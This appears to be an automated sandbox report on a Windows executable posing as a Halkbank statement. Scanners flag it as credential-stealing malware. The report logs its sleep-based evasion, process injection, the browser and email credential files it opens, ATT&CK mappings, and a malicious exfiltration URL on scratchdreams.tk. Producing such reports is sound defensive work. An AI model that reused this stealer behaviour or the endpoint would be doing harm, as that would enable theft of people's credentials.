                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593485Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593360Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593235Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 593110Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 592961Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591563Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591422Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591313Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591188Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 591063Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeThread delayed: delay time: 590938Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Window / User API: threadDelayed 3219
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Window / User API: threadDelayed 6567
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 1684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep count: 36 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 2828Thread sleep count: 3219 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 2828Thread sleep count: 6567 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -599110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -598110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -597985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -597860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -597735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -596310s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe TID: 6688Thread sleep time: -596197s >= -30000sJump to behavior
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3220287888.0000000000C87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Code function: 3_2_0662BE28 LdrInitializeThunk,3_2_0662BE28
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Memory written: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27964d0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.29803a8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.29823c0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.297f390.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2002086129.0000000006C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1980117407.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1980117407.0000000002813000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27964d0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.29803a8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.29823c0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.297f390.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2002086129.0000000006C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1980117407.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1980117407.0000000002813000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTR
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Software Packing | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                  Source | Detection | Scanner | Label | Link
                  Halkbank_Ekstre_20230426_075819_154055.exe | 56% | Virustotal | | Browse
                  Halkbank_Ekstre_20230426_075819_154055.exe | 45% | ReversingLabs | Win32.Ransomware.Loki |
                  Halkbank_Ekstre_20230426_075819_154055.exe | 100% | Avira | HEUR/AGEN.1352067 |
                  Halkbank_Ekstre_20230426_075819_154055.exe | 100% | Joe Sandbox ML | |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  reallyfreegeoip.org | 2% | Virustotal | | Browse
                  scratchdreams.tk | 17% | Virustotal | | Browse
                  checkip.dyndns.com | 0% | Virustotal | | Browse
                  checkip.dyndns.org | 0% | Virustotal | | Browse
                  Source | Detection | Scanner | Label | Link
                  http://checkip.dyndns.org/ | 0% | URL Reputation | safe |
                  http://checkip.dyndns.org/q | 0% | URL Reputation | safe |
                  http://reallyfreegeoip.org | 0% | URL Reputation | safe |
                  https://reallyfreegeoip.org | 0% | URL Reputation | safe |
                  http://checkip.dyndns.org | 0% | URL Reputation | safe |
                  http://checkip.dyndns.com | 0% | URL Reputation | safe |
                  https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe |
                  http://tempuri.org/DataSeta.xsd)Microsoft | 0% | Avira URL Cloud | safe |
                  https://scratchdreams.tk | 100% | Avira URL Cloud | malware |
                  https://scratchdreams.tk/_send_.php?TS | 100% | Avira URL Cloud | malware |
                  https://reallyfreegeoip.org/xml/191.96.150.225 | 0% | Avira URL Cloud | safe |
                  http://scratchdreams.tk | 17% | Virustotal | | Browse
                  https://scratchdreams.tk | 18% | Virustotal | | Browse
                  http://scratchdreams.tk | 100% | Avira URL Cloud | malware |
                  http://tempuri.org/DataSeta.xsd)Microsoft | 2% | Virustotal | | Browse
                  https://scratchdreams.tk/_send_.php?TS | 16% | Virustotal | | Browse
                  https://reallyfreegeoip.org/xml/191.96.150.225$ | 0% | Avira URL Cloud | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  reallyfreegeoip.org | 172.67.177.134 | true | false | | unknown
                  scratchdreams.tk | 104.21.27.85 | true | false | | unknown
                  checkip.dyndns.com | 132.226.247.73 | true | false | | unknown
                  checkip.dyndns.org | unknown | unknown | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
                  https://reallyfreegeoip.org/xml/191.96.150.225 | false | Avira URL Cloud: safe | unknown
                  https://scratchdreams.tk/_send_.php?TS | false | 16%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://tempuri.org/DataSeta.xsd)Microsoft | Halkbank_Ekstre_20230426_075819_154055.exe | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  http://checkip.dyndns.org/q | Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://scratchdreams.tk | Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp | false | 18%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                  http://reallyfreegeoip.org | Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                  https://reallyfreegeoip.orgHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://checkip.dyndns.orgHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://checkip.dyndns.comHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://scratchdreams.tkHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B6B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 17%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
